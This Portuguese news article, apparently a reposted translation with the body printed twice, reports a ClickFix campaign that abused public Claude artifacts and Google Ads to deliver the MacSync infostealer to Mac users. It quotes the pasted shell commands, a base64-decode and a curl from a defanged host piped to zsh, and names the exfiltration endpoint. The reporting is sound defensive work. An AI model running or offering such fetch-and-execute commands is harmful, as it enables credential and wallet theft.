🔥 Fique por dentro das novidades mais quentes do momento! 🔥
Confira agora e compartilhe com seus amigos!
Apoie esse projeto de divulgacao de noticias! Clique aqui
Os agentes de ameaças estão abusando dos artefatos do Claude e do Google Ads em campanhas ClickFix que fornecem malware infostealer para usuários do macOS que procuram consultas específicas.
Pelo menos duas variantes da atividade maliciosa foram observadas e mais de 10.000 usuários acessaram o conteúdo com instruções perigosas.
Um artefato Claude é um conteúdo gerado com o LLM da Antropic que foi tornado público pelo autor. Pode ser qualquer coisa, desde instruções, guias, pedaços de código ou outros tipos de resultados isolados do chat principal e acessíveis a qualquer pessoa por meio de links hospedados no domínio claude.ai.
A página de um artefato avisa os usuários que o conteúdo mostrado foi gerado pelo usuário e não foi verificado quanto à precisão.
Pesquisadores da divisão investigativa da MacPaw, Moonlock Lab, e da empresa de bloqueio de anúncios AdGuard notaram resultados de pesquisa maliciosos sendo exibidos para diversas consultas, como "resolvedor de DNS on-line", "analisador de espaço em disco CLI do macOS" e "HomeBrew".
Resultados de pesquisa maliciosos do HomeBrewFonte: AdGuard
Resultados maliciosos promovidos na Pesquisa Google levam a um artefato público de Claude ou a um artigo do Medium que se faz passar pelo Suporte da Apple. Em ambos os casos, o usuário é instruído a colar um comando shell no Terminal.
In the first variant of the attack, the command given for execution is: ‘echo "..." | base64 -D | zsh,'
enquanto no segundo é: ‘true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh’.
Segunda variante usando uma página falsa de suporte da AppleFonte: Moonlock Lab
Os pesquisadores do Moonlock descobriram que o guia malicioso de Claude já recebeu pelo menos 15.600 visualizações, o que pode ser uma indicação do número de usuários que caíram no truque.
Os pesquisadores do AdGuard observaram o mesmo guia alguns dias antes, quando ele teve 12.300 visualizações.
O guia ClickFix hospedado em uma conversa de ClaudeFonte: Moonlock Lab
A execução do comando no Terminal busca um carregador de malware para o infostealer MacSync, que exfiltra informações confidenciais presentes no sistema.
De acordo com os pesquisadores, o malware estabelece comunicação com a infraestrutura de comando e controle (C2) usando um token codificado e uma chave de API, e falsifica um agente de usuário do navegador macOS para se misturar à atividade normal.
“A resposta é canalizada diretamente para o osascript – o AppleScript lida com o roubo real (chaveiro, dados do navegador, carteiras criptografadas)”, dizem os pesquisadores.
Os dados roubados são empacotados em um arquivo em ‘/tmp/osalogging.zip’ e depois exfiltrados para o C2 do invasor em a2abotnet[.]com/gate por meio de uma solicitação HTTP POST. Em caso de falha, o arquivo é dividido em pedaços menores e a exfiltração é repetida oito vezes. Após um upload bem-sucedido, uma etapa de limpeza exclui todos os rastros.
O MoonLock Lab descobriu que ambas as variantes buscam o segundo estágio do mesmo endereço C2, indicando que o mesmo agente da ameaça está por trás da atividade observada.
Uma campanha semelhante aproveitou o recurso de compartilhamento de bate-papo no ChatGPT e no Grok para fornecer o infostealer AMOS. Em dezembro de 2025, os pesquisadores descobriram a promoção depois que descobriram que as conversas do ChatGPT e do Grok estavam sendo aproveitadas em ataques ClickFix direcionados a usuários de Mac.
A variação Claude do ataque indica que o abuso se expandiu para outros grandes modelos de linguagem (LLMs).
Recomenda-se aos usuários que tenham cautela e evitem executar comandos no Terminal que não entendem totalmente. Como os investigadores da Kaspersky observaram no passado, perguntar ao chatbot na mesma conversa sobre a segurança dos comandos fornecidos é uma forma simples de determinar se são seguros ou não.
O futuro da infraestrutura de TI está aqui
A infraestrutura de TI moderna se move mais rápido do que os fluxos de trabalho manuais podem suportar. Neste novo guia do Tines, saiba como sua equipe pode reduzir atrasos manuais ocultos, melhorar a confiabilidade por meio de respostas automatizadas e criar e dimensionar fluxos de trabalho inteligentes com base nas ferramentas que você já usa.
Obtenha o guia
Pelo menos duas variantes da atividade maliciosa foram observadas e mais de 10.000 usuários acessaram o conteúdo com instruções perigosas.
Um artefato Claude é um conteúdo gerado com o LLM da Antropic que foi tornado público pelo autor. Pode ser qualquer coisa, desde instruções, guias, pedaços de código ou outros tipos de resultados isolados do chat principal e acessíveis a qualquer pessoa por meio de links hospedados no domínio claude.ai.
A página de um artefato avisa os usuários que o conteúdo mostrado foi gerado pelo usuário e não foi verificado quanto à precisão.
Pesquisadores da divisão investigativa da MacPaw, Moonlock Lab, e da empresa de bloqueio de anúncios AdGuard notaram resultados de pesquisa maliciosos sendo exibidos para diversas consultas, como "resolvedor de DNS on-line", "analisador de espaço em disco CLI do macOS" e "HomeBrew".
Resultados de pesquisa maliciosos do HomeBrewFonte: AdGuard
Resultados maliciosos promovidos na Pesquisa Google levam a um artefato público de Claude ou a um artigo do Medium que se faz passar pelo Suporte da Apple. Em ambos os casos, o usuário é instruído a colar um comando shell no Terminal.
In the first variant of the attack, the command given for execution is: ‘echo "..." | base64 -D | zsh,'
enquanto no segundo é: ‘true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh’.
Segunda variante usando uma página falsa de suporte da AppleFonte: Moonlock Lab
Os pesquisadores do Moonlock descobriram que o guia malicioso de Claude já recebeu pelo menos 15.600 visualizações, o que pode ser uma indicação do número de usuários que caíram no truque.
Os pesquisadores do AdGuard observaram o mesmo guia alguns dias antes, quando ele teve 12.300 visualizações.
O guia ClickFix hospedado em uma conversa de ClaudeFonte: Moonlock Lab
A execução do comando no Terminal busca um carregador de malware para o infostealer MacSync, que exfiltra informações confidenciais presentes no sistema.
De acordo com os pesquisadores, o malware estabelece comunicação com a infraestrutura de comando e controle (C2) usando um token codificado e uma chave de API, e falsifica um agente de usuário do navegador macOS para se misturar à atividade normal.
“A resposta é canalizada diretamente para o osascript – o AppleScript lida com o roubo real (chaveiro, dados do navegador, carteiras criptografadas)”, dizem os pesquisadores.
Os dados roubados são empacotados em um arquivo em ‘/tmp/osalogging.zip’ e depois exfiltrados para o C2 do invasor em a2abotnet[.]com/gate por meio de uma solicitação HTTP POST. Em caso de falha, o arquivo é dividido em pedaços menores e a exfiltração é repetida oito vezes. Após um upload bem-sucedido, uma etapa de limpeza exclui todos os rastros.
O MoonLock Lab descobriu que ambas as variantes buscam o segundo estágio do mesmo endereço C2, indicando que o mesmo agente da ameaça está por trás da atividade observada.
Uma campanha semelhante aproveitou o recurso de compartilhamento de bate-papo no ChatGPT e no Grok para fornecer o infostealer AMOS. Em dezembro de 2025, os pesquisadores descobriram a promoção depois que descobriram que as conversas do ChatGPT e do Grok estavam sendo aproveitadas em ataques ClickFix direcionados a usuários de Mac.
A variação Claude do ataque indica que o abuso se expandiu para outros grandes modelos de linguagem (LLMs).
Recomenda-se aos usuários que tenham cautela e evitem executar comandos no Terminal que não entendem totalmente. Como os investigadores da Kaspersky observaram no passado, perguntar ao chatbot na mesma conversa sobre a segurança dos comandos fornecidos é uma forma simples de determinar se são seguros ou não.
O futuro da infraestrutura de TI está aqui
A infraestrutura de TI moderna se move mais rápido do que os fluxos de trabalho manuais podem suportar. Neste novo guia do Tines, saiba como sua equipe pode reduzir atrasos manuais ocultos, melhorar a confiabilidade por meio de respostas automatizadas e criar e dimensionar fluxos de trabalho inteligentes com base nas ferramentas que você já usa.
Obtenha o guia
#samirnews #samir #news #boletimtec #artefatos #de #claude #llm #abusados #para #empurrar #infostealers #do #mac #no #ataque #clickfix
🎉 Obrigado por acompanhar, até a próxima notícia!
Postar um comentário